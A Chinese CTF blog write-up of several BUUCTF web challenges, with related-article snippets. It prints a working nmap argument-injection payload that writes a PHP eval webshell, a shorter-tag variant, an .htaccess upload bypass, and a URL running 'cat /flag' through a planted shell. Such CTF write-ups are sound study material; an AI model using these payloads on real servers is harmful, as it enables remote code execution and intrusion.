BUUctf第六天

最新推荐文章于 2022-08-08 22:15:00 发布

盖世大宝剑a

最新推荐文章于 2022-08-08 22:15:00 发布

阅读量153

点赞数

本文链接：https://blog.csdn.net/jie_a/article/details/118121387

版权

[BUUCTF 2018]Online Tool

在这里插入图片描述

细细品读
这是个两个过滤字符出现的漏洞
利用nmap写🐎
namp 可以写木马，那么我们要做的，让nmap执行那个命令。但是
这两个函数。会把我们的命令给放道单引号里，

'\<\?php eval\(\$_POST\[\"a\"\]\)\;\?\> -oG 1.php'最后的语句，就变成了：
nmap -T5 -sT -Pn --host-timeout 2 -F '\<\?php eval\(\$_POST\[\"a\"\]\)\;\?\> -oG 1.php'

我们的命令，被当成了字符串，而不是一条命令，那么我们就要想办法，闭合单引号。
这时候搜索可以发现在nmap命令中有一个参数-oG可以实现将命令和结果写到文件

'<?php eval($_POST["a"]);?> -oG 1.php '

然后蚁剑连接就行
在这里插入图片描述
蓝色的是文件夹名字，然后加上刚刚创建的文件就行了

[GXYCTF2019]BabyUpload

上传上传
上传.htaccess,然后上传呢个没有php的🐎
只能上传jpg的🐎
在这里插入图片描述

[RoarCTF 2019]Easy Java

不会java 再议

[强网杯 2019]高明的黑客

下载不动了…
在这里插入图片描述
题目大概意思是从一大堆,shell中找给能用的shell
我就不看了
payload:/xk0SzyKwfzw.php?Efa5BVG=cat /flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

盖世大宝剑a

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

BUUCTF

Q221022的博客

02-12

1264

1.old-fashion 直接用quiqiup解密即可得到flag 2.世上无难事看到答案是32位，我就想到了MD5，然后用MD5解密，不对，不是MD5，所以就用quipqiup试试，key就出来了 3.RSA3 题上有两组c和e，只有一个n，（所以猜测这两组应该用的是同一个n）将n分解成p和q（不知道为什么，我用了三个网站都没分解出来，是因为数字太大吗？）然后，就可以求出私钥d，进而解密出m ，得到答案 4.RSA2 dp=d mod （p-1）我认为..

BUUCTF[第二章Web进阶]XSS闯关教程

最新发布

DMXA的博客

11-01

708

攻击方式：这种攻击多见于论坛、博客和留言板，攻击者在发帖的过程中，将恶意代码连同正常信息一起注入帖子的内容中。当目标用户访问该链接时，服务器接收该目标用户的请求并进行处理，然后服务器把带有XSS代码的数据发送给目标用户的浏览器，浏览器解析这段带有XSS代码的恶意脚本后，就会触发XSS漏洞。存储型XSS又称为持久型XSS，攻击脚本将被永久的放在目标服务器的数据库或文件中，具有很高的隐蔽性。DOM型XSS其实是一种特殊的反射型XSS，它基于DOM文档对象模型的一种漏洞。(3)DOM型XSS。

参与评论您还未登录，请先登录后发表或查看评论

[BUUCTF-pwn] [BSidesCF 2019]Genius

weixin_52640415的博客

02-10

301

这个题打死也作不出来，看了个英文的wp 外国弄的这东西，思路不常见。一个是Genius文件是下人俄罗斯方块游戏（出的块是固定序列）这个本身没有问题。另外一个是loader文件，这个文件把游戏文件读入内存中，并允许修改两次每次1字节（通过一种JS啥的编码取5个字节中的若干位组成偏移和修改的字节）然后运行程序。思路：一是修改memset它在plt表中位置是XX30修改1字节改为XX20这个是system的plt表，以gameover的时候会调用到这个，就相当于system(XXX)了 ...

BUUCTF 2018 Online Tool（escapeshellarg和escapeshellcmd使用不当导致rce）

qq_45521281的博客

05-20

1192

参考：谈谈escapeshellarg参数绕过和注入的问题 PHP escapeshellarg()和escapeshellcmd()并用之殇谈escapeshellarg绕过与参数注入漏洞 https://blog.csdn.net/qq_26406447/article/details/100711933 进入题目显示php源码：这里用到escapeshellarg()、escapeshellcmd()两个函数： escapeshellarg： escapeshellarg() 将给字符串增加一

PHP代码审计10—命令执行漏洞

W0ngk，一个安全菜鸡，一直在模仿，尚未有超越。

08-04

2061

php命令执行基础与CTF例题分析

buu web：Online Tool（nmap文件写入）

m0_55378150的博客

04-05

595

打开靶场，好家伙，上来就是代码，我喜欢老规矩，找核心代码 echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host); 这里调用了system函数使用了nmap命令，只有host参数是可控的，并且它是以get方式传入的，我们先测试一下本地ip：?host=127.0.0.1 正常回显，我们往回看看怎么利用 if(!isset($_GET['host'])) { highlight_file(__FILE__); } e

BUUCTF 2018 Online Tool

qq_50613938的博客

10-25

153

//首先看到前两行代码X_FORWARDED_FOR和REMOTE_ADDR这里是让服务器用来获取ip用的这里没什么用 ```handlebars if(!isset( $_GET['host'])) {//这里传进来了一个参数 highlight_file(__FILE__); } else { $host = $_GET['host']; $host = escapeshellarg($host); /*一眼就能看出来这里的 $host = escapeshellcmd($host);.

Buuctf-01

Usashi的博客

10-27

1319

Basic Linux Labs 参考链接 ssh -p 28309 root@node4.buuoj.cn -p指定端口，root为用户名，@后为ip地址第一次连接需要输入yes ls ../ cat ../flag.txt flag{2a02935d-b864-48c0-850c-f8f4ef1e11cd} BUU LFI COURSE 1 <?php /** * Created by PhpStorm. * User: jinzhao * Date:.

BUUCTF BabyRSA

qq_63719504的博客

07-15

461

BUUCTF BabyRSA 。本题考察数学中的平方和和平方差以及进制转换和最基础的RSA加密得到密文m。先用int('0x',16)将16进制转换成10进制。可以用来对bytes对象的内容进行显示。

BUUCTF-WriteUp

鱼的博客

02-01

739

title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境，打开网址是一张滑稽，没什么用，看一下源码，发现有注释。访问source.php，直接给了源码，进行代码审计。分两块，第一块是emmm::checkFile，里面做了一些判断。第二块是一个include，文件包含，我们要绕过验证，也就是上面的checkFile方法。 hint.php include触发的三个判断.

『CTF Web复现』[BUUCTF 2018]Online Tool

Ho1aAs‘s Blog

10-24

3833

@[toc] # 利用点 - nmap写文件 - escapeshellarg() + escapeshellcmd()使用不当 # Payload ``` [GET]http://URL/?host='<?php eval($_POST[a]);?> -oG 1.php ' ```

1.29刷题

Lumos427的博客

01-29

583

1.[BUUCTF 2018]Online Tool <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET['host']; $host

【buuctf】Online tool 命令执行&RCE&nmap

qq_37301470的博客

11-21

3167

Online tool 被自己蠢到了，一句话上传成功后没看见沙盒地址，一直蚁剑连接失败。。。有源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_

buuctf(探险2)

qq_62046696的博客

08-08

919

先上传一个一句话木马.，过滤了然后用可以通过，大概还是过滤了

关于buu上的namp两道题

m0_55185160的博客

03-28

1952

关于buu上的namp两道题这个是题目的源码源码中只要用到了escapeshellarg()函数和escapeshellcmd()函数，经过搜索这两个函数我们来了解这两个函数：看这些概念没看太懂，那么我们来实际测试一下，更容易理解些经过 escapeshellarg 函数处理过的参数被拼凑成 shell 命令，并且被双引号包裹这样就会造成漏洞，这主要在于bash中双引号和单引号解析变量是有区别的。在解析单引号的时候 , 被单引号包裹的内容中如果有变量 , 这.

[BUUCTF 2018]Online Tool

m0_62092622的博客

04-15

429

打开是源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET['host']; //escapeshellarg — 把字符串转码为

[网鼎杯 2020 朱雀组]Nmap(namp写webshell)

EC_Carrot的博客

12-20

434

前言文章所涉及的资料来自互联网整理和个人总结，意在于个人学习和经验汇总，如有什么地方侵权，请联系本人删除，谢谢！本文仅用于学习与交流，不得用于非法用途！题目这里用到nmap写webshell的技巧，如下代码 ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 这样就能够将一句话写到目录下，再用菜刀或者蚁剑来连，但是这题过滤了php字样，所以标签用短标签，后缀用phtml来绕过 ' <?= @eval($_POST["hack"]);?&

BUUCTF解题web十一道(03)

qq_45837896的博客

06-09

772

[极客大挑战 2019]HardSQL 看这个标题着实心里一紧，完了，写不出来了？又是同一系列，这次看看有什么新挑战输入万能密码出现这个，应该是敏感字符过滤，然后试了几次，发现+,=,and,<,>,空格,tab,换行都被过滤测试闭合单引号是，有个闭合错误，但是这样不能用联合注入和堆叠注入，没有空格可以用，只能考虑报错注入好家伙报错注入忘记很多，再看一遍报错注入常见函数: updatexml(),extractvalue,floor() floor(rand(0

buuctf wireshark

09-12

根据您提供的引用内容，buuctf wireshark 是一个与buuctf比赛相关的题目。其中，Wireshark 是一个网络封包分析软件，可以用来捕获和分析网络数据包。根据[1]中提供的下载地址，可以下载 Wireshark 软件进行使用。 ...